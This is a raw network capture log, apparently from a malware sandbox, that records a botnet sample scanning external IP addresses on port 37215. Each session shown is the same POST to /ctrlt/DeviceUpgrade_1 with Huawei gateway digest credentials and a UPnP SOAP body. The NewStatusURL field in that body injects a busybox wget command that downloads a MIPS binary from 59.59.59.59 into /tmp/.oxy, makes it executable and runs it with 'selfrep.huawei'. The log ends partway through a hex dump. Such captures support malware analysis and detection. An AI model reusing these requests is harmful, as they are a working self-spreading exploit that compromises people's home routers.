                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1726192.168.2.1532824157.29.227.2237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.966698885 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1727192.168.2.1549544197.50.243.22137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.966728926 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1728192.168.2.1549514157.87.62.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.899679899 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1729192.168.2.153683882.11.206.13737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.899730921 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1730192.168.2.1547848126.199.33.17137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.905199051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1731192.168.2.154527241.196.28.15337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.910099030 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1732192.168.2.155693641.176.215.8437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.910125017 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1733192.168.2.153615241.89.69.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.910151005 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1734192.168.2.1548338158.133.109.6237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.910168886 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1735192.168.2.1535366197.47.28.9237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.910195112 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 